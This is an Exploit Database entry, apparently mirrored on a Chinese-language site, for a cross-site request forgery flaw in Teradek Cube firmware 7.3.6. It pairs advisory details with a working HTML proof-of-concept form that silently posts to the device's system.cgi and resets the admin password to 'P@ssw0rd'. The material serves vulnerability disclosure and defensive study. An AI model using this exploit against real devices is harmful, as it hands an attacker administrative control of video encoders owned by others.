Teradek Cube 7.3.6 – Cross-Site Request Forgery

• Exploit Database
• 17 阅读

• 作者： LiquidWorm
  日期： 2018-05-21
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44675/

• <!--
  
  Teradek Cube 7.3.6 CSRF Change Password Exploit
  
  
  Vendor: Teradek, LLC
  Product web page: https://www.teradek.com
  Affected version: Firmware Version: 7.3.6 (build 26850)
  Hardware Version: 1.5
  Teradek Firmware Version 7.3.15
  
  
  Summary: Cube packs world-class video quality into a rugged, portable
  chassis for quick IP video deployments at any location. Each encoder
  and decoder includes HDMI and 3G-SDI I/O, Ethernet / WiFI connectivity,
  and full duplex IFB.
  
  Desc: The application interface allows users to perform certain actions
  via HTTP requests without performing any validity checks to verify the
  requests. This can be exploited to perform certain actions with administrative
  privileges if a logged-in user visits a malicious web site.
  
  Tested on: lighttpd/1.4.31
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2018-5464
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5464.php
  
  
  02.03.2018
  
  -->
  
  
  <html>
  <body>
  <form action="http://127.0.0.1/cgi-bin/system.cgi" method="POST">
  <input type="hidden" name="command" value="password" />
  <input type="hidden" name="pw1" value="P@ssw0rd" />
  <input type="hidden" name="pw2" value="P@ssw0rd" />
  <input type="hidden" name="user" value="admin" />
  <input type="hidden" name="action" value="Change&#32;Password" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>